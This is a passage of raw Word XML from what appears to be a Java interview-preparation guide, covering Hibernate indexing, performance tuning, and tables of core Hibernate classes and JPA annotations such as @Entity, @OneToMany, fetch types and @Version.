          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1796D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Using JPA/Hibernate Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02BF4D"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D71B6D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indexes = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80A6C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name", columnList = "name"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B1B7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dept", columnList = "department")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9E27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621CE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1FC188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elds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4491A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494CBD9"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Full-Text Search (Optional - Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D1A4C" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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full-text indexing, use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate Search</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Lucene or Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6C6F9"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4B546">
          <v:rect id="_x0000_i2433" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC37E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E89F6C8"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tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Hibernate involves optimizing fetching strategies, minimizing DB hits, and reducing memory/connection overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD2A5A"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ndexing</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps speed up query performance by allowing the database to quickly locate data rows. It’s recommended for frequently queried columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8747F1" w14:textId="450DBBA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434" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E792FF1" w14:textId="5D138CA6" w:rsidR="00092BE3" w:rsidRPr="00CE4B95" w:rsidRDefault="00092BE3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="565" w:name="_Toc197867779"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain different classes and annotations in hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="565"/>
    </w:p>
    <w:p w14:paraId="53B7AED7" w14:textId="1DAA65B5" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DE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Classes and Annotations in Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB4E2A"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ACB84">
          <v:rect id="_x0000_i2435" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B275D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5391"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="28923CE6" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D6008C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lass / Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483EB428"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D95D2E0" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D36F94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1105FB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s Hibernate config (hibernate.cfg.xml), bootstrap class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="62145E9A" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67C7B4D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7371714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actory for Session, created once per application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="52B5CE64" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="427E2C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7D842CC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resents a single unit of work, handles DB operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="511F10EA" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23BBA9E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7172832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ages transactions within a session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="270E7F83" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FD8CA6F"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 TypedQuery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ADACD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and execute HQL/JPQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3DCCA884" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="723E940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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65C125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dynamic, type-safe queries (JPA Criteria API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F69976F"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E45AC">
          <v:rect id="_x0000_i2436" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3621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mportant Hibernate / JPA Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3765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907"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="47478210" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E2F42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5620E6E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6D81A8C7" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D557E9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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E684C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rks a class as an entity mapped to a DB table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="79FCC231" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2234C152"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE9375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table name and optional indexes/constraints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="1A7D6755" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70B2DDD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d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18F56DA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primary key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3BD98EB8" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F1E7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neratedValue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7647CEE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auto-generation strategy for primary key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7D11C3F7" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24450D2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lumn(name="...")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08173325"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class field to table column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="79168BEA" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D97DD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ient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3615B03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eld is not persisted in the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="710290F5"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688"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7FAAA871" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A7FF813"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6A5CA8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5C267935" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="510CE89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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7742E3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 relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="700109AA" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B04DA2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14327D6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 relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="61265EBD" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72DCC2A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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A238E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 relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7008855D" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="180D603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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5430D28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 relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3E640941" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F12D3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Column(name="...")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C601DC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oreign key column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="481D9714" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC3DD0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Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B041EC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in many-to-many mapping to define join table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3C9E53A6" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3239AB7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pedBy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6974B05A"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define bidirectional relationships</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20FBD0D0"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4578"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="41803D32" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7786764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7C7577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17A2D6F" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FB87A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FetchMode.JOIN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="133CE0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etch strategy (JOIN, SELECT, SUBSELECT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5D07BF91" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672DB68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Type.LAZY / EAGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FBFD2D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when data is fetched</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="6C804027" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D4D127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scade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60CB261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cascading operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F29FA2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3434"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5E34ABBD" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="586F5A4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42E82087"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766D1B46" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25AD638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medQuery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07D0F5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 static HQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="1B799F58" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52BC463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mbedded / @Embeddable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BDD7FB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beds value types within an entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2A583C66" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E2C33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 @DiscriminatorColumn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D68036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mapping between classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="354C209E" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1611D9B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sion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45D91D7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optimistic locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="448C24B1"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38C3C">
          <v:rect id="_x0000_i2437" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F68653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300547C" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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asses</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Session, SessionFactory, and Transaction are core to interacting with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB600E5" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00702DEA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1985"/>
        </w:num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are used to define how Java objects map to relational database tables and their relationships, behaviors, and constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8B094" w14:textId="7D1EBE49"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438" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF7992" w14:textId="655256DD" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74B00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
